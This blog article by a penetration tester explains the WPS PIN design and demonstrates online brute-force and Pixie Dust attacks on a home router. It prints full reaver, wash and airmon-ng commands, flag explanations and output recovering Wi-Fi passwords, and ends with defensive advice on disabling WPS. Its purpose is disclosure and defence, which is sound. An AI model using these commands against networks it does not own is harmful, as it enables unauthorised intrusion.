My worst nightmare on discovering a Wi-Fi WPS vulnerability on my home router

Keith Tay
Published in The Startup
11 min read, Jul 17, 2020

TL;DR Disable WPS on your router or access point today! Otherwise, an attacker could gain a foothold into your network and plan for further attacks.

In my own research, I was surprised to find that my home router was vulnerable to a WPS offline brute force attack. What that means is that an attacker within a reasonable distance (up to approximately 50 m if a strong wireless-capable device is used) was able to extract my Wi-Fi's WPA2-PSK, which was more than 12 characters long (with reasonable complexity), in mere seconds!

I have disclosed the vulnerability to my telco service provider, who is working with the vendor to issue a patch for all users of the issued device.

What is WPS?
In 2006, the Wi-Fi Alliance introduced WPS, originally known as Wi-Fi Simple Config. WPS is a wireless network security standard that makes establishing connections between a router and wireless devices faster and easier. Instead of the traditional way of selecting the network name (the SSID) and keying in the password (the WPA-PSK key), WPS can be triggered by just a button press on the physical device. It works well for electronic devices (e.g. printers, TVs, smart home products etc.) with no or limited user interface.

WPS in application
Even if you have not used WPS before, I am sure most of you would have come across it without knowing what it was for at the time. For the purpose of explanation, let's assume there are two wireless devices, a.k.a. clients (a printer and an Android phone), that wish to join the network using WPS. The first step is to trigger the WPS feature on the wireless device.

Figure 1: Press the WPS button on the printer (image from: https://solidguides.com/wp-content/uploads/2019/02/wps-on-a-printer-720x368.jpg)
Figure 2: Select WPS connection via the Wi-Fi setting on an Android phone

Secondly, the user has to go to the router or Access Point (AP) and trigger the WPS feature there. Once pressed, this technology performs its magic.

Figure 3: Press the WPS connection button on the router/AP

The devices should then be connected a few seconds later. If the wireless device has some form of user interface, you should be able to see the successful connection to the network.

Figure 4: Indication of successful connection on the Android phone

In the printer's case, a successful connection will likely be indicated by a flashing LED or some other form of indicator.

What we have discussed is the Push Button Configuration (PBC) method. An alternative is to provide an 8-digit PIN, which is known as the Personal Identification Number (PIN) method. In addition, these modes can be triggered either by the client or by the AP.

How is WPS bad?
As mentioned earlier, WPS was created with convenience in mind, which means there is a huge trade-off between security and convenience. In a nutshell, an attacker who manages to obtain the WPS PIN of an AP can authenticate to your network and even extract your seemingly complex Wi-Fi password.

There are three types of attacks against WPS-enabled APs. The first is an online brute force attack, and the second is an offline attack on the WPS PIN. An attacker can perform these two attacks from up to approximately 50 meters away, depending on the capability of their wireless network device. The last attack requires the attacker to be physically next to the AP. For example, the attacker could press the WPS button on the AP (as shown in the previous section), and at times the WPS PIN is printed on the AP itself. Assuming there is a malicious insider, this could be an easy entry into the corporate network. Even though these attacks have been shared over the internet for the past decade, WPS-enabled devices are still everywhere (enabled by default)!

Before we dive into the specifics of the first two attacks, let's look at how the WPS PIN is structured.

WPS Pin Structure
Every WPS PIN consists of an 8-digit number. The last digit of the PIN is a checksum. However, the 8-digit PIN isn't validated against the AP in its entirety at once. The process requires the client to first prove possession of the first four digits. Only if the first four digits are correct will the AP require the client to furnish the remaining four digits.

From an attacker's perspective, this means that a brute force attempt is actually feasible, with a total of 11,000 possibilities: 10⁴ for the first four digits, plus 10³ for the second half, since only three of its four digits are unknown (the last digit is a checksum that can be calculated).
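As an added illustration (not code from the original article), the following Python checks the checksum digit of a WPS PIN and quantifies the search space just described. The function names are my own; the checksum weighting follows the Wi-Fi Simple Configuration specification, and the sample PINs are the ones that appear in the reaver output later in this article. A practitioner can use it, for example, to confirm that a PIN printed on a device label is a well-formed WPS PIN.

```python
# Added example (not from the original article): validate the checksum digit of an
# 8-digit WPS PIN and quantify the search space the article describes.
# Function names are my own; the checksum rule follows the Wi-Fi Simple Configuration spec.

WPS_PIN_LENGTH = 8


def wps_checksum(first7: str) -> int:
    """Return the checksum digit for the first seven digits of a WPS PIN.

    Digits at even positions (0, 2, 4, 6, counting from the left) are weighted 3,
    digits at odd positions are weighted 1; the checksum digit makes the
    weighted sum a multiple of 10.
    """
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    weighted = sum(int(d) * (3 if i % 2 == 0 else 1) for i, d in enumerate(first7))
    return (10 - weighted % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is eight digits and its last digit is the correct checksum."""
    if len(pin) != WPS_PIN_LENGTH or not pin.isdigit():
        return False
    return int(pin[-1]) == wps_checksum(pin[:-1])


def effective_search_space() -> int:
    """Number of attempts an online brute force needs in the worst case.

    The AP acknowledges the first half (four digits) on its own, so it is
    searched separately: 10**4 candidates. The second half has only three
    unknown digits because the eighth is the checksum: 10**3 candidates.
    """
    first_half = 10 ** 4
    second_half = 10 ** 3
    return first_half + second_half


def worst_case_days(seconds_per_attempt: float) -> float:
    """Worst-case duration in days at a given rate (the article measured ~33 s/pin)."""
    return effective_search_space() * seconds_per_attempt / 86400


if __name__ == "__main__":
    # Sample PINs: the three shown in the article's reaver output plus one bad checksum.
    for pin in ("12345670", "11115670", "63968767", "12345678"):
        print(pin, "valid" if is_valid_wps_pin(pin) else "bad checksum")
    print("search space:", effective_search_space())
    print(f"worst case at 33 s/pin: {worst_case_days(33):.1f} days")
```

Note that the 11,000 figure is a worst case for the online attack only; the offline attack described later does not depend on the number of candidates at all.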

Figure 5: WPS pin structure breakdown

Online brute force attack
Before going into the nitty-gritty details, a proper WPS transaction involves a series of exchanges between a client and an AP.

Figure 6: An overview of the exchanges between client (attacker) and AP
*For simplicity, I have used the terms client and AP rather than the industry terms (registrar and enrollee).

In summary, this series of exchanges is also known as a "cryptodance". Each side proves to the other that it knows the PIN without giving it away first.

To conduct this online brute force attack, we can use the reaver tool. Do note that many blogs out there use an older version of reaver, and the flags/parameters they show may not apply to the latest version. I spent many hours figuring out the appropriate flags and how to tell from the verbose output messages whether the tool is working well. I will share them in detail. For my demonstration, I am using a Kali Linux VM along with a Wi-Fi USB adapter (Alfa).

Put the wireless adapter into monitor mode:

root@kali:~# airmon-ng start wlan0

Identify nearby devices that have WPS:

root@kali:~# wash -i wlan0mon
BSSID              Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------
58:6D:8F:09:95:77  11  -30  2.0  No   Broadcom  TestAP

*A simple search around my home vicinity revealed more than 30 APs allowing WPS.

Start performing the online brute force against the BSSID you are targeting:

root@kali:~# reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 -N -L -c 11
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 58:6D:8F:09:95:77
[+] Switching wlan0mon to channel 11
[+] Received beacon from 58:6D:8F:09:95:77
[+] Vendor: Broadcom
[+] Trying pin “11115670”
[+] Sending authentication request
[+] Sending association request
[+] Associated with 58:6D:8F:09:95:77 (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
//If the client is unable to furnish the first four digits of the PIN, the AP will not send the M5 message. The brute force continues with a different PIN.
[+] 15.62% complete @ 2020-06-25 03:16:33 (33 seconds/pin)
[+] Trying pin “63968767”
[+] Sending authentication request
[+] Sending association request
[+] Associated with 58:6D:8F:09:95:77 (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
< truncated for brevity reasons>
[+] Received M1 message
[+] Sending M2 message
< truncated for brevity reasons>
[+] Received M3 message
[+] Sending M4 message
< truncated for brevity reasons>
[+] Received M5 message
[+] Sending M6 message
< truncated for brevity reasons>
[+] Received M7 message
[+] Sending WSC NACK
[+] Pin cracked in 51 seconds
[+] WPS PIN: ‘63968767’
[+] WPA PSK: ‘testing1’
[+] AP SSID: ‘TestAP’

*Note: Do not be alarmed if you observe a lot of repeated packets coming from the AP. I have snipped them out for brevity.

reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 -N -L -c 11

- -vv -> Display non-critical warnings (-vv or -vvv for more)
- -d -> Set the delay between pin attempts. You may need to modify this value or the timeout (-t) to circumvent possible rate-limiting on the device
- -N -> Do not send NACK messages when out-of-order packets are received. I noticed that if this option is not set, I am unable to perform any successful brute force
- -L -> Ignore locked state reported by the target AP
- -c -> Set the 802.11 channel for the interface (implies -f)

Based on the output of the tool, it takes approximately 33 seconds to test a PIN. Thus, with 11,000 possibilities, it may take up to 4 days to gain access to the network. Still, a pretty feasible wait to gain a foothold in the network. I usually start the brute force from 6000 onward (by modifying the code in keys.c) and subsequently work downwards from 6000. It may just be me, but I tend to notice that the majority (80%) of WPS PINs start in the higher range (6000 0000 to 9999 9999). With sufficient time, an online brute force attack will work and eventually reveal the PSK to an attacker.

Offline brute force attack
A Swiss researcher by the name of Dominique Bongard found a flaw in many APs' implementation of the M3 message highlighted in Figure 6. In it, the AP encrypts the actual PIN using a strong algorithm (AES) with secret keys consisting of two randomly chosen numbers, and sends you the result. As mentioned, the process is a 'cryptodance': the AP has committed to its proof that it knows the PIN, but in a way that you can't verify until later.

Referencing a good analogy shared in the Sophos blog: "it's a bit like a sealed-bid auction, where the router's bid is locked in before yours, but in a way that you can't see it in order to determine your bid. But what the Swiss researcher found is that many routers didn't seal their bids very well, using "random" numbers that you could guess, or in some cases calculate for yourself. In other words, at step M3, you could simply fail the protocol, and go ahead cracking the encryption on the M3 data packet. That would reveal the PIN directly, no guessing required."

All in all, it is possible to brute force the WPS PIN by capturing a single attempted (even failed) exchange. This allows an attacker to obtain the WPS PIN in mere seconds, and eventually the Wi-Fi PSK, gaining access to the Wi-Fi network.

However, this attack goes back to the early 2010s and most vendors have already patched the issue. Just recently, when I embarked on this research journey, I recall telling my colleagues that WPS offline cracking attacks had long been fixed, and from reading forums, security testers reported never having seen an AP vulnerable to this issue.

Ironically, when I returned home to test my home network, I was surprised that the 'pixiedust' tool instantly returned my WPA2-PSK in mere seconds. What's more, I had used a password longer than 12 characters with reasonable complexity. The nightmare was that the AP did not allow me to disable WPS. I immediately searched the internet for updated firmware, but there wasn't any.

*To date, I have informed the telco of the vulnerability and they are working with the vendor to issue a patch in the coming months.

Most of the WPS attack tools have been integrated into the reaver tool. This test is pretty quick: if it works, it works; if it doesn't, that just means your product is not vulnerable to offline brute force attacks. To conduct this attack, simply run the following command:

root@kali:/tmp# reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 -K
// -K will trigger the pixiedust attack. All it requires is a single failed attempt to try to crack the PIN.
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from <BSSID>
[+] Received beacon from <BSSID>
[+] Trying pin “12345670”
[+] Sending authentication request
[+] Sending association request
[+] Associated with <BSSID> (ESSID: <redacted>)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
executing pixiewps -e <redacted> -s <redacted> -z <redacted> -a <redacted> -n <redacted> -r <redacted>
Pixiewps 1.4
[?] Mode: 3 (RTL819x)
[*] Seed N1: <redacted>
[*] Seed ES1: <redacted>
[*] Seed ES2: <redacted>
[*] PSK1: <redacted 16 byte hex>
[*] PSK2: <redacted 16 byte hex>
[*] ES1: <redacted 16 byte hex>
[*] ES2: <redacted 16 byte hex>
[+] WPS pin: <redacted>
[*] Time taken: 0 s 70 ms
[+] Pixiewps: success: setting pin to <redacted>
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Updated P1 array
[+] Updated P2 array
[+] Quitting after pixiewps attack
[+] Pin cracked in 15 seconds
[+] WPS PIN: <redacted>
[+] WPA PSK: <redacted>
[+] AP SSID: <redacted>

As seen from the output, the PIN was cracked in 15 seconds. This is way faster than the online brute forcing technique, which could take up to approximately four days.

What should you do to prevent yourself from being a target?
Personally, I feel that Wi-Fi settings, configuration and security have often been overlooked. We have seen the good and the bad of WPS, and yet it is enabled by default in most APs today. I would like to share a couple of recommendations to prevent WPS attacks:

  • Disable WPS if it is not in use … Disable WPS if it is not in use … Disable WPS if it is not in use! I can't stress this enough. You can do so by heading to your AP's web interface (if you have not changed your web portal login credentials, this would be a good time to do so!) and locating the WPS feature. By disabling it, you are cutting off all connections via WPS. This applies to both the push button mode and the PIN mode (as demonstrated in the attacks). If you really need to use WPS to pair devices with no or limited user interface, just remember to turn the feature on and then off again after the successful pairing.
  • Evaluate your home routers by performing simple tests on them. There are instances where, even after you turn off WPS, the AP could still mysteriously be accepting WPS in the background. You can watch for such behaviour by listening on the air (wash -i wlan0mon). If you are a frequent user of WPS, you may want to ensure that the AP is not vulnerable to the offline brute force attack.
  • Remove any printed WPS PIN from your physical device. With a disclosed PIN, an attacker could specify it using the -p flag in Reaver. A malicious insider would then be able to obtain your network PSK in a single try via the online brute force attack.
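Added example, not part of the original article: a small Python parser for wash output (in the column layout shown earlier in this article) that reports whether the BSSIDs you own are still advertising WPS. Because wash only lists APs whose beacons carry the WPS information element, an AP that still shows up after you "disabled" WPS in its web interface is exactly the background-acceptance case described above. The function names and the sample wash rows are my own, constructed for illustration; in practice you would feed it the saved output of `wash -i wlan0mon`.

```python
# Added example (not from the original article): parse the output of `wash`
# (column layout as shown in the article) and check whether your own access
# points still advertise WPS after you believe you have disabled it.
# Function names and the sample rows below are my own, constructed for illustration.
import re
from dataclasses import dataclass

# One wash data row: BSSID, channel, signal, WPS version, lock state, vendor, ESSID.
WASH_ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<channel>\d+)\s+"
    r"(?P<dbm>-?\d+)\s+"
    r"(?P<wps>\S+)\s+"
    r"(?P<locked>Yes|No)\s+"
    r"(?P<vendor>\S+)\s+"
    r"(?P<essid>.*?)\s*$"
)


@dataclass
class WpsAp:
    bssid: str
    channel: int
    dbm: int
    wps_version: str
    locked: bool
    vendor: str
    essid: str


def parse_wash(output: str) -> list[WpsAp]:
    """Return one WpsAp per data row; header, separator and blank lines are skipped."""
    aps = []
    for line in output.splitlines():
        m = WASH_ROW.match(line.strip())
        if not m:
            continue  # header, separator, blank or unparseable line
        aps.append(WpsAp(
            bssid=m["bssid"].upper(),
            channel=int(m["channel"]),
            dbm=int(m["dbm"]),
            wps_version=m["wps"],
            locked=(m["locked"] == "Yes"),
            vendor=m["vendor"],
            essid=m["essid"],
        ))
    return aps


def audit_own_aps(output: str, own_bssids: set[str]) -> dict[str, str]:
    """Map each BSSID you own to a verdict.

    wash only lists APs whose beacons carry the WPS information element, so an
    AP that appears here is still advertising WPS regardless of what its web
    interface says. 'locked' means the AP currently reports the WPS locked state
    (typically after too many failed PIN attempts).
    """
    seen = {ap.bssid: ap for ap in parse_wash(output)}
    verdicts = {}
    for bssid in sorted(b.upper() for b in own_bssids):
        ap = seen.get(bssid)
        if ap is None:
            verdicts[bssid] = "not advertising WPS"
        elif ap.locked:
            verdicts[bssid] = "advertising WPS (locked)"
        else:
            verdicts[bssid] = "advertising WPS (unlocked)"
    return verdicts


# Constructed sample of wash output; MAC addresses and network names are made up.
SAMPLE_WASH = """\
BSSID              Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------
00:11:22:33:44:55  11  -30  2.0  No   Broadcom  HomeNet
66:77:88:99:AA:BB   1  -65  1.0  Yes  RalinkTe  Guest Network
"""

if __name__ == "__main__":
    # Constructed: the two BSSIDs we pretend to own; only the first is still listed.
    own = {"00:11:22:33:44:55", "CC:DD:EE:FF:00:11"}
    for bssid, verdict in audit_own_aps(SAMPLE_WASH, own).items():
        print(f"{bssid}: {verdict}")
```

A "not advertising WPS" verdict only tells you the beacon no longer carries the WPS element; the ESSID and vendor columns are kept so you can also spot a neighbouring AP with your own SSID, which is worth a second look.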

Keith Tay
Cyber-Enthusiast | IoT Specialist | Penetration Testing | Red Teaming